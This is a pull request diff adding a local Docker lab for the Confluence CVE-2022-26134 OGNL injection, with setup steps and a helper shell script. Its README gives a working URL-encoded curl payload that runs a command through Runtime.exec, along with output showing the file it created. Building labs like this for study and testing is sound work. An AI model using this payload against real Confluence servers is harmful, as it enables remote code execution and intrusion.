Merge pull request #5 from zmallen/zma/cve-2022-26134

Confluence CVE-2022-26134 OGNL vulnerable environment

proof-of-concept-exploits/confluence-cve-2022-26134/README.md

@@ -0,0 +1,74 @@
+# Confluence CVE-2022-26134 OGNL vulnerability
+
+This vulnerability affects Confluence Server and Confluence Data Center. It allows an attacker to send a specially crafted HTTP request to abuse OGNL within Confluence, leading to remote code execution.
+
+In order for this vulnerability to be exploitable, the following conditions must be met:
+* Use versions of Confluence lower than 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1
+* Confluence is configured (can't use a server that hasn't been installed and not connected to a DB)
+
+
+## Running the application
+
+Run it:
+
+```
+docker-compose up
+```
+
+Install confluence
+
+1. Navigate to `localhost:8090`
+2. Get a trial license (this won't work without one)
+3. In db setup step, put in hostname: `db`, port: `5432`, dbname: `conf`, username: `postgres`, password: `koko`
+4. It'll take a while to configure, make sure you have 3-4gb of RAM
+5. Use a test site/template, and use confluence to manage users. Fill in default for admin
+6. Once you get past the admin creation step, you can run the exploit
+
+## Exploitation steps
+
+```
+curl -v http://localhost:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/pwned%22%29%7D/
+```
+
+Output:
+
+```
+└> curl -v http://localhost:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/pwned%22%29%7D/
+*   Trying ::1...
+* TCP_NODELAY set
+* Connected to localhost (::1) port 8090 (#0)
+> GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/pwned%22%29%7D/ HTTP/1.1
+> Host: localhost:8090
+> User-Agent: curl/7.64.1
+> Accept: */*
+>
+< HTTP/1.1 302
+< Cache-Control: no-store
+< Expires: Thu, 01 Jan 1970 00:00:00 GMT
+< X-Confluence-Request-Time: 1654294225669
+< Set-Cookie: JSESSIONID=A12C784ACFF928E9155587F78E9EC0C0; Path=/; HttpOnly
+< X-XSS-Protection: 1; mode=block
+< X-Content-Type-Options: nosniff
+< X-Frame-Options: SAMEORIGIN
+< Content-Security-Policy: frame-ancestors 'self'
+< Location: /login.action?os_destination=%2F%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch+%2Ftmp%2Fpwned%22%29%7D%2Findex.action&permissionViolation=true
+< Content-Type: text/html;charset=UTF-8
+< Content-Length: 0
+< Date: Fri, 03 Jun 2022 22:10:25 GMT
+<
+* Connection #0 to host localhost left intact
+* Closing connection 0
+```
+
+Exec into the container
+
+```
+└> ./getshell.sh confluence
+
+root@b2db3bfbe364:/var/atlassian/application-data/confluence# ls -lah /tmp
+total 12K
+drwxrwxrwt 1 root       root       4.0K Jun  3 22:12 .
+drwxr-xr-x 1 root       root       4.0K Jun  3 19:56 ..
+drwxr-xr-x 2 confluence confluence 4.0K Jun  3 22:07 hsperfdata_confluence
+-rw-r----- 1 confluence confluence    0 Jun  3 22:10 pwned
+```

proof-of-concept-exploits/confluence-cve-2022-26134/docker-compose.yml

@@ -0,0 +1,16 @@
+version: "3.9"
+services:
+  conf:
+    image: atlassian/confluence-server@sha256:83a19d7c474b550b4ab4ef383e93e16c02457d680a982debcaf32b3b7db5bf52
+    depends_on:
+      - db
+    ports:
+       - 8090:8090
+       - 8091:8091
+  # port = 5432, username = postgres
+  db:
+    image: postgres
+    restart: always
+    environment:
+      POSTGRES_PASSWORD: koko
+      POSTGRES_DB: conf

proof-of-concept-exploits/confluence-cve-2022-26134/getshell.sh

@@ -0,0 +1,2 @@
+#!/bin/bash
+docker exec -t -i `docker ps | grep "$1" | cut -d " " -f 1` bash